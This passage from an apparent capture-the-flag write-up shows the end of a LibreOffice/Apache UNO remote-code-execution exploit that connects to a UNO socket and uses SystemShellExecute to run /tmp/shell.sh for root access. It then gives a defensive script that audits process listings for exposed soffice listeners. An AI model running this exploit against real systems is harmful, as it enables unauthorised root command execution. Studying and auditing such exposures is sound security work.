    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute /tmp/shell.sh
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("/tmp/shell.sh", '',1)
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
https://www.exploit-db.com/exploits/46544
Now execute the following while listening on the port on our Kali machine.
🚩Root Access
Since we have successfully gained root access, all we need to do is get the root flag.
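The escalation above depends on an soffice process that accepts UNO socket connections (the --accept=socket,... option quoted in the exploit header) while running with more privilege than the user who connects to it. As an added example for defenders, not code from this writeup or from the exploit author, the following audits a process listing for such listeners; the sample ps lines, user names and severity labels are constructed assumptions.

```python
import shlex

# Constructed `ps -eo user,args` sample (not output from the host in this writeup).
SAMPLE_PS = """\
root  /usr/lib/libreoffice/program/soffice.bin --accept=socket,host=0.0.0.0,port=2002;urp;StarOffice.Service
root  /usr/lib/libreoffice/program/soffice.bin --headless --accept=socket,host=localhost,port=2002;urp;
alice /usr/lib/libreoffice/program/soffice.bin --accept=socket,host=127.0.0.1,port=8100;urp;
bob   /usr/lib/libreoffice/program/soffice.bin --accept=pipe,name=bob_office;urp;
carol /usr/lib/libreoffice/program/soffice.bin --writer report.odt
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_accept(value):
    """Parse 'socket,host=H,port=P;urp;Name' into (connection type, params dict)."""
    connection = value.split(";", 1)[0]
    kind, *pairs = connection.split(",")
    params = dict(p.split("=", 1) for p in pairs if "=" in p)
    return kind.strip().lower(), params


def audit_ps(ps_text):
    """Return one finding per soffice process that accepts UNO socket connections."""
    findings = []
    for line in ps_text.splitlines():
        fields = line.split(None, 1)
        if len(fields) < 2:
            continue
        user, argv = fields[0], shlex.split(fields[1])
        if "soffice" not in argv[0]:
            continue
        for arg in argv[1:]:
            name, _, value = arg.lstrip("-").partition("=")
            if name != "accept":
                continue
            kind, params = parse_accept(value)
            if kind != "socket":
                continue  # named pipes are not reachable over TCP
            host = params.get("host", "")
            # Assumption: a missing host is treated as exposed, to err on the safe side.
            exposed = host not in LOOPBACK
            as_root = user == "root"
            severity = ("critical" if as_root and exposed
                        else "high" if as_root or exposed else "medium")
            findings.append({"user": user, "host": host,
                             "port": params.get("port", ""), "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_ps(SAMPLE_PS):
        print("{severity:8} user={user} listen={host}:{port}".format(**f))
```

A loopback-only listener owned by root is still rated high, because any local account that can reach the port can ask the service manager to run commands as root, which is the situation this box relies on.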